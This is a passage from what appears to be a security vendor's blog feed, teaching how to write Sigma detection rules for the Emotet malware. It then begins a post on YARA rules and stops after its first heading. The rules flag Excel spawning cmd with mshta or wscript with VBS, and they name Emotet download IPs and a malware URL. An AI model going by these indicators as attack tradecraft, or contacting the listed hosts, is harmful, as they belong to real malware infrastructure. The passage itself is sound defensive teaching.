&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;selection1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;ParentImage&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;excel.exe&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;Image&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;cmd.exe&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;CommandLine|contains&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;mshta&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;condition&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;selection1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Detection rule for Emotet based only on process execution.&lt;/p&gt;
&lt;p&gt;This rule is based exactly on the information we have found in our analysis
making the rule very strict (for instance we detect only the cmd process that
was executed by Excel, so if the threat actor tries using Word instead of Excel
we will miss the execution). In some cases we will want to keep our rule strict
to avoid false positives, in other cases it can be useful to add relevant
information. For example, in some cases
&lt;a href="https://www.bleepingcomputer.com/news/security/emotet-malware-now-wants-you-to-upgrade-microsoft-word/"target="_blank" rel="noopener"&gt;Emotet uses Word documents&lt;/a&gt;
so we can extend the rule to include detection of cmd processes that execute
Word, Excel, and PowerPoint. This way the detection will cover other variants
of the threat. A good example of a rule that covers more variants of shell
execution by Office software is a rule created by Michael Haag, Florian Roth,
Markus Neis, Elastic, FPT.EagleEye Team called
&lt;a href="https://github.com/SigmaHQ/sigma/blob/becf3baeb4f6313bf267f7e8d6e9808fc0fc059c/rules/windows/process_creation/proc_creation_win_office_shell.yml"target="_blank" rel="noopener"&gt;proc_creation_win_office_shell.yml&lt;/a&gt;.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;title&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;Emotet Download IP&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;author&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;Intezer&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;logsource&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;category&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;firewall&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;detection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;select_outgoing&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;dst_ip&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;91.240.118.16&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;condition&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;select_outgoing&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Detection rule for Emotet server based on the IP address from the sample.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;title&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;Emotet IP addresses&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;author&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;Intezer&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;logsource&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;category&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;webserver&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;detection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;selection1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;c-uri|contains&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;http://91.240.118.168/zzx/ccv/fe.html&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;condition&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;selection1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Detection rule for Emotet based on the URL from the sample.&lt;/p&gt;
&lt;p&gt;We used two networking indicators in our detection rule, but there are many
resources with information that we can use to enhance our Emotet detection
indicators (including
&lt;a href="https://github.com/executemalware/Malware-IOCs/blob/main/2022-03-24%20Emotet%20%28E4%29%20IOCs"target="_blank" rel="noopener"&gt;GitHub&lt;/a&gt;
and &lt;a href="https://twitter.com/hashtag/Emotet?src=hashtag_click"target="_blank" rel="noopener"&gt;Twitter&lt;/a&gt;).&lt;/p&gt;
&lt;h3&gt;There is a &amp;ldquo;But&amp;rdquo;&lt;span class="hx:absolute hx:-mt-20" id="there-is-a-but"&gt;&lt;/span&gt;
&lt;a href="#there-is-a-but" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Emotet is a threat that is constantly evolving not only its features but also
its infrastructure which is based on botnets that deliver the malware to
victims&amp;rsquo; systems, allowing the attackers to constantly change the domains and
the IP addresses of these servers. As described in the Pyramid of Pain,
mentioned above, it is relatively easy for attackers to change the hashes and
IP addresses once they are detected by security tools and organizations. This
makes some of the detection rules useless as the indicators are not relevant
anymore.&lt;/p&gt;
&lt;p&gt;Our goal is to have solid detection rules that will not produce false positive
alerts and will help protect the organization. We need to make our Sigma rules
more advanced, to catch variants within a malware family like Emotet.&lt;/p&gt;
&lt;h2&gt;Take the Detection Opportunities a Step Further&lt;span class="hx:absolute hx:-mt-20" id="take-the-detection-opportunities-a-step-further"&gt;&lt;/span&gt;
&lt;a href="#take-the-detection-opportunities-a-step-further" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;To be able to detect Emotet and similar threats that evolve, we need to find
the detection indicators that are shared among the malware family. This
detection strategy will produce alerts that are specific for a certain threat,
because we will use indicators that are part of the threat&amp;rsquo;s behavior and were
used more than once.&lt;/p&gt;
&lt;p&gt;To implement this approach we will need to have information about the
connections between samples of the same malware family, and identify detection
indicators that are common in a specific malware family.&lt;/p&gt;
&lt;p&gt;Intezer offers this capability, with a proprietary code reuse database that
also extracts valuable information about the detection indicators of different
malware samples.&lt;/p&gt;
&lt;p&gt;In the next section here, we will show how to build Sigma rules using detection
indicators that are shared among several samples of the same threat.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s examine another Excel
&lt;a href="https://analyze.intezer.com/files/12315dbe67fd3db9ce3c1f520fef14e10e946b7a1d8628583c2a26949312edc5/detect-hunt"target="_blank" rel="noopener"&gt;file&lt;/a&gt;
that delivers Emotet:&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/05/threat-hunting-sigma-detection-rules/images/fig4.png" title="Analysis of Emotet." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Analysis of Emotet.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The file was executed in Intezer&amp;rsquo;s sandbox and its behavior was analyzed
allowing the platform to extract detection indicators. In this file we have 24
indicators total and five of them were previously seen in other Emotet samples.
The indicators of this file can produce good detection rules as they are based
on the execution process, which is a key part of the malware. This reduces the
chances of the threat actor changing these indicators (unlike file names or
URLs that are easy to change).&lt;/p&gt;
&lt;p&gt;We can use the information provided by Intezer to produce the following Sigma
rule:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;title&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;Emotet vbs execution detection&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;author&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;Intezer&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;logsource&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;category&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;process_creation&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;product&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;windows&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;detection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;selection1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;ParentImage&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;excel.exe&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;Image&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;wscript.exe&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;CommandLine|contains&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;vbs&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;condition&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;selection1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Emotet detection rule based on indicators that are common in the Emotet family.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;title&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;Emotet family file creation detection&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;author&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;Intezer&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;logsource&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;product&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;windows&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;category&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;file_event&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;detection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;TargetFilename|endswith&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;Application DataMicrosoftFormsEXCEL.box&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;condition&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;filename&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Emotet detection based on indicators that are common in the Emotet family.&lt;/p&gt;
&lt;p&gt;Both rules are based on behavior that was seen in different samples of Emotet.
We can make the first rule even more strict by using specific commands and file
names in the &lt;code&gt;CommandLine&lt;/code&gt; specification. The second rule is based on a file
that is seen in Emotet samples – while it might look like a false positive,
based on our observations this file can be used as a good indication of
malicious activity caused by Emotet.&lt;/p&gt;
&lt;p&gt;Recently Intezer added detection opportunities per family to allow you to stay
ahead of emerging threats. This feature allows users to get all of the
detection artifacts that were seen in a specific family and combined with
&lt;a href="https://analyze.intezer.com/api/docs/documentation"target="_blank" rel="noopener"&gt;Intezer&amp;rsquo;s API&lt;/a&gt; allows
users to extract up-to-date behavioral artifacts, so you can create rules to
proactively hunt for the existence of a threat within your organization and
create updated detection rules.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/05/threat-hunting-sigma-detection-rules/images/fig5.png" title="Family page view for Emotet in an enterprise account, showing the relevant detection opportunities." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Family page view for Emotet in an enterprise account, showing the relevant detection opportunities.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;span class="hx:absolute hx:-mt-20" id="conclusion"&gt;&lt;/span&gt;
&lt;a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Creating good and efficient detection rules is a form of art. There could be
more than one &amp;ldquo;correct&amp;rdquo; way to write a rule from the same indicators. But at
the end of the day, our goal is to detect threats and stop them and for that we
need to know which indicators are unique to a specific threat and less likely
to change among the variants of the malware.&lt;/p&gt;
&lt;p&gt;You can get IoCs, artifacts, and other detection opportunities for creating
Sigma rules using Intezer.&lt;/p&gt;</description></item><item><title>How to Write YARA Rules That Minimize False Positives</title><link>https://research.intezer.com/blog/2022/05/yara-rules-minimize-false-positives/</link><pubDate>Thu, 12 May 2022 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2022/05/yara-rules-minimize-false-positives/</guid><description>
&lt;h2&gt;Generate Advanced YARA Rules Based on Code Reuse&lt;span class="hx:absolute hx:-mt-20" id="generate-advanced-yara-rules-based-on-code-reuse"&gt;&lt;/span&gt;
&lt;a href="#generate-advanced-yara-rules-based-on-code-reuse" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Incorporating YARA into daily security operations can accelerate incident
response time, classify malware, empower threat intelligence and improve
detection capabilities by creating custom signatures.&lt;/p&gt;
&lt;p&gt;While YARA is a popular tool for SOC and IR teams, the main challenge is
deciding what to base your YARA rules on for maximum effectiveness. In this
post, we will explain how identifying code reuse between malicious files can be
used to automatically develop advanced YARA rules to increase the accuracy of
malware detection, reduce false positives, and improve threat hunting
capabilities.&lt;/p&gt;
&lt;h2&gt;What Are YARA Rules?&lt;span class="hx:absolute hx:-mt-20" id="what-are-yara-rules"&gt;&lt;/span&gt;
